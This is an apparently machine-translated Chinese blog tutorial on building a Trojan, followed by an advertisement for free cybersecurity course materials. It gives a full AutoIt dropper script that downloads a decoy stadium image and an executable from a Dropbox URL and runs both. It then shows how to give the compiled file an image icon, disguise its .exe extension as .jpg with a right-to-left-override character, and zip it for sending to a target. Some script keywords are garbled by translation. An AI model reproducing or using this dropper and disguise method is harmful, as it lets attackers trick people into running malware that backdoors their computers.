前言
特洛伊木马(或特洛伊木马)是可能感染您的计算机或移动设备的最常见和最危险的威胁类型之一。
什么是木马恶意软件?
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
创建我的木马恶意软件
在这篇博客中,我将向您展示如何将我的可执行文件与图像文件结合起来,并且在打开时,它能够在目标人打开它时显示图像,但同时可执行文件在后台运行。简而言之,我将.exe
文件隐藏在.jpg
图像文件中。
此方法可以扩展到任何文件类型,如图像、pdf、音乐等。大多数情况下,可执行文件是病毒或用于访问目标计算机的后门。我们来看看步骤:
1. 获取图像和.exe
文件的直接 URL
可执行文件.exe
需要出现在公开可用的 URL 上,浏览器可以从该 URL 直接下载该可执行文件。为此,我已将可执行文件上传到 Dropbox 上。对于 dropbox,将可共享链接的末尾部分修改为dl=1
将允许浏览器直接下载文件。我在下面共享的链接不包含任何代码,实际上是一个空文件,因此您可以安全地测试此链接的行为。
可执行文件的 URL .exe
:https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe ?dl=1
图片的网址:
体育场馆形象
我使用了体育场馆的图像作为封面。
2. 在脚本中使用 URL
#include <StaticConstants.au3>
#include <WindowsConstants.au3>本地 $urls = "url1,url2"本地 $urlsArray = StringSplit($urls, ",", 2 )对于 $url 在 $urlsArray
$sFile = \_DownloadFile($url)
shellExecute($sFile)下一个Func \_DownloadFile($sURL)
本地 $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, "^.\*/", "")
$sDirectory = @TempDir & $sFile
$hDownload = InetGet($sURL, $sDirectory, 17 , 1)
InetClose($hDownload)
返回 $sDirectory
EndFunc ;==>\_GetURLImage
在上面代码的第 3 行中,替换url1
为图像的 URL 和url2
可执行文件的 URL。我的最终代码如下所示
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
本地 $urls = " https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park\_garden\_concourse.jpg ,https://www.dropbox.com/s/hsnvw0ik1em0637/some\_evil\_file.exe?dl=1 "
本地 $urlsArray = StringSplit($urls, ",", 2 )
对于 $url 在 $urlsArray
$sFile = \_DownloadFile($ url)
shellExecute($sFile)
Next
Func \_DownloadFile($sURL)
本地 $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, "^.\*/", "")
$sDirectory = @TempDir & $sFile
$hDownload = InetGet ($sURL, $sDirectory, 17, 1)
InetClose($hDownload)
返回 $sDirectory
EndFunc ;==>\_GetURLImage
使用扩展名保存文件.au3
。我已将该文件命名为trojan.au3
.
3. 为文件创建图标
由于我使用图像作为封面文件,Windows
通常将图像的缩略图显示为文件图标,因此我将使用体育综合体图像作为图标并将其转换为.ico
格式。你可以用谷歌搜索它,你会发现很多工具可以做到这一点。我使用这个网站 - https://cloudconvert.com/jpg-to-ico
4. 编译脚本
该脚本是用一种称为 的脚本语言编写的AutoIt
。AutoIt
要在 Ubuntu 中安装,您可以安装wine
并安装AutoIt
,或者如果您想要一种简单的方法,请Veil
按照此处提到的步骤进行安装https://www.javatpoint.com/installing-veil。AutoIt
将在其中一个步骤中进行安装,然后您可以退出安装。
打开编译 AutoIt 应用程序。该窗口应类似于下图所示的框。输入文件的位置trojan.au3
和文件的路径.ico
。
转换后的文件在 Windows 机器上看起来像这样。
嗯,有些不对劲。该文件的问题在于其扩展名。很明显它是一个可执行文件,因为它的扩展名是.exe
. 我们需要欺骗这个扩展。
5. 欺骗“.exe”扩展名到任何扩展名
为了欺骗明显的扩展名.exe
并将其替换为.jpeg
,我们将使用一个right-to-left-override
字符。
要了解欺骗实际工作原理以及角色放置位置的详细信息right-to-left-override
,请阅读博客。
欺骗文件扩展名——道德黑客
文件扩展名欺骗是创建木马时的一个方便技巧。我将把“.exe”扩展名欺骗为“.jpg”……
levelup.gitconnected.com
总结一下上面博客中提到的步骤:
-
重命名
trojan.exe
为trojangpj.exe
. -
将字符粘贴
right-to-left-override
到trojan后面的第7个位置。该字符之后的所有字符right-to-left-override
将被翻转,即从右向左读取。
文件名现在看起来像trojanexe.jpg
由于文件中包含的图像是一个体育中心的图像,因此我将trojan
名称替换为sportscompl_
,以便文件名显示为sports_complexe.jpg
.
恭喜!!!木马已准备就绪。
现在文件名与包含的图像匹配。一些最新的浏览器在下载之前删除了从右到左的覆盖。因此,最好将文件压缩并发送出去。
零基础入门黑客/网络安全
【----帮助网安学习,以下所有学习资料文末免费领取!----】
> ① 网安学习成长路径思维导图
> ② 60+网安经典常用工具包
> ③ 100+SRC漏洞分析报告
> ④ 150+网安攻防实战技术电子书
> ⑤ 最权威CISSP 认证考试指南+题库
> ⑥ 超1800页CTF实战技巧手册
> ⑦ 最新网安大厂面试题合集(含答案)
> ⑧ APP客户端安全检测指南(安卓+IOS)
大纲
首先要找一份详细的大纲。
学习教程
第一阶段:零基础入门系列教程
该阶段学完即可年薪15w+
第二阶段:技术入门
弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞
该阶段学完年薪25w+
阶段三:高阶提升
反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练
该阶段学完即可年薪30w+
面试刷题
最后,我其实要给部分人泼冷水,因为说实话,上面讲到的资料包获取没有任何的门槛。
但是,我觉得很多人拿到了却并不会去学习。
大部分人的问题看似是“如何行动”,其实是“无法开始”。
几乎任何一个领域都是这样,所谓“万事开头难”,绝大多数人都卡在第一步,还没开始就自己把自己淘汰出局了。
如果你真的确信自己喜欢网络安全/黑客技术,马上行动起来,比一切都重要。
资料领取
上述这份完整版的网络安全学习资料已经上传网盘,朋友们如果需要可以微信扫描下方二维码 即可自动领取↓↓↓
或者
【点此链接】领取